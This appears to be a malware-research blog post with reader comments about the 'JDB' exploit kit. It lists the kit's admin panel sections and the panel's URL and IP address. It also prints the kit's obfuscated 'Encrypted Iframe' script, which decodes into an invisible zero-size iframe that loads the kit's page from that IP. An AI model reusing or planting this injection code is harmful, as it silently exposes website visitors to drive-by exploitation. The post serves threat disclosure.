Login:
Overview:
Stats:
Iframe Generator:
Encrypted Iframe:
<script>var UQPC0r2no6qVVr = 'UQPC0r2no6qVVr3cUQPC0r2no6qVVr69UQPC0r2no6qVVr66UQPC0r2no6qVVr72UQPC0r2no6qVVr61UQPC0r2no6qVVr6dUQPC0r2no6qVVr65UQPC0r2no6qVVr20UQPC0r2no6qVVr73UQPC0r2no6qVVr72UQPC0r2no6qVVr63UQPC0r2no6qVVr3dUQPC0r2no6qVVr22UQPC0r2no6qVVr68UQPC0r2no6qVVr74UQPC0r2no6qVVr74UQPC0r2no6qVVr70UQPC0r2no6qVVr3aUQPC0r2no6qVVr2fUQPC0r2no6qVVr2fUQPC0r2no6qVVr31UQPC0r2no6qVVr37UQPC0r2no6qVVr36UQPC0r2no6qVVr2eUQPC0r2no6qVVr33UQPC0r2no6qVVr31UQPC0r2no6qVVr2eUQPC0r2no6qVVr37UQPC0r2no6qVVr32UQPC0r2no6qVVr2eUQPC0r2no6qVVr39UQPC0r2no6qVVr36UQPC0r2no6qVVr2fUQPC0r2no6qVVr6aUQPC0r2no6qVVr64UQPC0r2no6qVVr62UQPC0r2no6qVVr2fUQPC0r2no6qVVr69UQPC0r2no6qVVr6eUQPC0r2no6qVVr66UQPC0r2no6qVVr2eUQPC0r2no6qVVr70UQPC0r2no6qVVr68UQPC0r2no6qVVr70UQPC0r2no6qVVr3fUQPC0r2no6qVVr69UQPC0r2no6qVVr64UQPC0r2no6qVVr3dUQPC0r2no6qVVr31UQPC0r2no6qVVr36UQPC0r2no6qVVr30UQPC0r2no6qVVr37UQPC0r2no6qVVr30UQPC0r2no6qVVr34UQPC0r2no6qVVr63UQPC0r2no6qVVr34UQPC0r2no6qVVr35UQPC0r2no6qVVr30UQPC0r2no6qVVr64UQPC0r2no6qVVr36UQPC0r2no6qVVr62UQPC0r2no6qVVr32UQPC0r2no6qVVr62UQPC0r2no6qVVr34UQPC0r2no6qVVr34UQPC0r2no6qVVr65UQPC0r2no6qVVr33UQPC0r2no6qVVr64UQPC0r2no6qVVr33UQPC0r2no6qVVr64UQPC0r2no6qVVr37UQPC0r2no6qVVr35UQPC0r2no6qVVr35UQPC0r2no6qVVr39UQPC0r2no6qVVr39UQPC0r2no6qVVr66UQPC0r2no6qVVr33UQPC0r2no6qVVr36UQPC0r2no6qVVr38UQPC0r2no6qVVr30UQPC0r2no6qVVr22UQPC0r2no6qVVr20UQPC0r2no6qVVr77UQPC0r2no6qVVr69UQPC0r2no6qVVr64UQPC0r2no6qVVr74UQPC0r2no6qVVr68UQPC0r2no6qVVr3dUQPC0r2no6qVVr22UQPC0r2no6qVVr30UQPC0r2no6qVVr22UQPC0r2no6qVVr20UQPC0r2no6qVVr68UQPC0r2no6qVVr65UQPC0r2no6qVVr69UQPC0r2no6qVVr67UQPC0r2no6qVVr68UQPC0r2no6qVVr74UQPC0r2no6qVVr3dUQPC0r2no6qVVr22UQPC0r2no6qVVr30UQPC0r2no6qVVr22UQPC0r2no6qVVr20UQPC0r2no6qVVr66UQPC0r2no6qVVr72UQPC0r2no6qVVr61UQPC0r2no6qVVr6dUQPC0r2no6qVVr65UQPC0r2no6qVVr62UQPC0r2no6qVVr6fUQPC0r2no6qVVr72UQPC0r2no6qVVr64UQPC0r2no6qVVr65UQPC0r2no6qVVr72UQPC0r2no6qVVr3dUQPC0r2no6qVVr22UQPC0r2no6qVVr30UQPC0r2no6qVVr22UQPC0r2no6qVVr3eUQPC0r2no6qVVr3cUQPC0r2no6qVVr2fUQPC0r2no6qVVr69UQPC0r2no6qVVr66UQPC0r2no6qVVr72UQPC0r2no6qVVr61UQPC0r2no6qVVr6dUQPC0r2no6qVVr65UQPC0r2no6qVVr3e'; vC05HXIZhrBMCB = UQPC0r2no6qVVr.replace(/UQPC0r2no6qVVr/g,'%');document.write(unescape(vC05HXIZhrBMCB));</script>
Settings:
http://anonproducts.in/jdb/panel.php
• dns: 1 » ip: 176.31.72.96 - adresse: ANONPRODUCTS.IN
• dns: 1 » ip: 176.31.72.96 - adresse: ANONPRODUCTS.IN
what's the password to panel.php?
ReplyDeleteyou probably don't belong here
DeleteJust me our ? after BL2 released they started to popup from no where all thoose JDB stuff :)
ReplyDeleteIf you can get me the JAR of the driveby, I can decompile it for you into its original state.
ReplyDeleteXylit0l. Here's more, landing page, jar, payloads, infection scheme.
ReplyDeletehttp://malwaremustdie.blogspot.jp/2013/01/peeking-at-jdb-exploit-kit-infector.html
http://malwaremustdie.blogspot.jp/2013/02/peeking-at-anon-jdb-exploit-kit-jar.html
#MalwareMustDie!